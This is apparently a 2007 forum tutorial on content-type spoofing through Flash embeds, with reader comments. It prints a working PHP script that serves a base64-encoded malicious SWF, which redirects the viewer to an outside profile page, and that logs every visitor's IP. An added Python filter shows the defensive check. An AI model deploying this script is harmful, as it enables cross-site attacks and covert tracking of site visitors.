Content Type Spoofing

Fooling the browser into doing things through content-type spoofing!



Profile sites often allow you to include music or a video. This can be a security risk when it is not implemented properly. Even when all input is filtered and all output (special characters included) is encoded, we can still set up an XSS or CSRF attack using Flash.

The music or video is usually included in the profile with an <embed src> tag. This tag is dangerous when it is used without the type attribute, which sets the content type of the target source; without it, the browser has to take the content type from the server's response.

The content type tells the web browser how the downloaded content should be handled. We obviously don't want a Flash file included, which is why .swf is disallowed. That must be secure, since we can't include a Flash file then, or can we? We still can, by setting the Content-Type response header to application/x-shockwave-flash: the browser hands the response to the Flash plugin no matter what extension the URL ends in.

So if we upload a PHP script that sets that header and then sends the 'evil' Flash file, the game is over.

Here is an example of such a script. It contains the Flash file base64-encoded, because the file contains bytes that are not alphanumeric.

<?php
// Content-type spoofing: the URL can end in .php, the browser still sees a Flash file.
// A personal script, usage at own risk.

// Tell the browser (and its plugin dispatch) that this response is a Flash file.
header('Content-Type: application/x-shockwave-flash');

// The SWF file, base64-encoded because it contains non-printable bytes.
$EvilCode = "RldTCGwAAAAwCgCgAAwBAEQRAAAAAEMC////PwNHAAAAlg4AAHZhY2F0aW9uAAAzMAA8li0AAGh0dHA6Ly93d3cuYm9vdGxlZ2dlcnMudXMvcHJvZmlsZS5waHAAAF90b3AAmgEAAgBAAAAA";
echo base64_decode($EvilCode);

// Log the address of every client that loaded the "Flash file".
$myFile = "l0g.tXt";
$fh = fopen($myFile, 'a');
fwrite($fh, "^_^ |" . $_SERVER['REMOTE_ADDR'] . "| ^_^\r\n");
fclose($fh);

?>
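To make the defensive side concrete, here is an added Python example that is not part of the original article. It models the filter the article bypasses (an <embed src> URL is accepted unless it ends in .swf) next to a check on the response itself: the declared Content-Type is compared against an allowlist and the body's leading bytes against that type's magic, which catches a Flash file whatever the URL says. The function names, the allowlist, the attacker.example and cdn.example URLs and the response bodies are all constructed for this example.

```python
# Added example, not code from the original article. It models the server-side
# filter the article describes (an <embed src> URL accepted unless it ends in
# .swf) and contrasts it with a check on what the URL actually returns.
# The helper names, the allowlist and the sample responses are assumptions.

SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")        # uncompressed, zlib, LZMA SWF headers
FLASH_MIME = "application/x-shockwave-flash"

# Declared content type -> magic bytes the body must start with to be accepted.
ALLOWED_MEDIA = {
    "audio/mpeg": (b"ID3", b"\xff\xfb", b"\xff\xf3", b"\xff\xf2"),
    "video/x-flv": (b"FLV\x01",),
}


def weak_extension_filter(url: str) -> bool:
    """The filter the article bypasses: reject only URLs whose path ends in .swf."""
    return not url.lower().split("?")[0].endswith(".swf")


def looks_like_swf(body: bytes) -> bool:
    """True for any SWF regardless of filename or declared Content-Type."""
    return len(body) >= 4 and body[:3] in SWF_MAGICS


def strong_response_filter(content_type: str, body: bytes) -> bool:
    """Accept only an allowlisted declared type whose body bytes match that type."""
    declared = content_type.split(";")[0].strip().lower()
    if declared == FLASH_MIME or looks_like_swf(body):
        return False
    magics = ALLOWED_MEDIA.get(declared)
    return magics is not None and body.startswith(magics)


# Constructed stand-in for fetching the URL: (Content-Type header, body bytes).
# "evil.php" plays the role of the article's script: .php extension, Flash bytes.
# "song.mp3" on the attacker host lies in the header but not in the bytes.
SAMPLE_RESPONSES = {
    "http://attacker.example/evil.php": (FLASH_MIME, b"FWS\x08\x6c\x00\x00\x00\x30\x0a"),
    "http://attacker.example/song.mp3": ("audio/mpeg", b"CWS\x09\x00\x10\x00\x00"),
    "http://cdn.example/song.mp3": ("audio/mpeg", b"ID3\x03\x00\x00\x00\x00\x00\x00"),
}


def check_embed_url(url: str) -> dict:
    """Run both checks on a URL using the constructed responses above."""
    content_type, body = SAMPLE_RESPONSES[url]
    return {
        "extension_filter": weak_extension_filter(url),
        "response_filter": strong_response_filter(content_type, body),
    }


if __name__ == "__main__":
    for url in SAMPLE_RESPONSES:
        print(url, check_embed_url(url))
```

Note the caveat a fetch-time check cannot remove: the attacker controls the remote server, so a URL that returned an MP3 when the profile was saved can return a SWF later. The response check only closes the hole when the site re-hosts the validated bytes itself (so the browser never talks to the attacker's server) and always writes an explicit type attribute on the embed tag.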

I hope you enjoyed my article and that I made it a bit clearer how this works, or maybe you already knew it ;). Anyway, please rate the article.

Comments

dalek on August 16 2007 - 02:29:36
This can also be done with the "Tamper Data" Firefox extension, which allows you to modify any posted content. You might be able to do it with LiveHTTPHeaders too.
Zarray on August 16 2007 - 12:49:48
No, it cannot. Tamper Data tampers with the outgoing REQUEST; here we spoof the RESPONSE from the webserver.
mozzer on August 24 2007 - 21:35:35
I don't quite get what you are getting at. All you've really shown is that you can run PHP when certain files are viewed, which is not really content-type spoofing.
system_meltdown on September 01 2007 - 08:15:03
You realize, even if you didn't have the logger in place, and it was actually just a SWF file, you could still get IPs from it; just check the access logs to see who's viewed it...
Zarray on September 02 2007 - 11:32:08
Yes, I know, or an img tag pointing to a PHP script. But I included it so you could see who loaded the Flash file...
mr noob on September 06 2007 - 22:47:53
What kind of fools would let you upload a PHP script in the first place? lol
Zarray on September 08 2007 - 13:30:34
lol, a hosting company like Freewebs, maybe?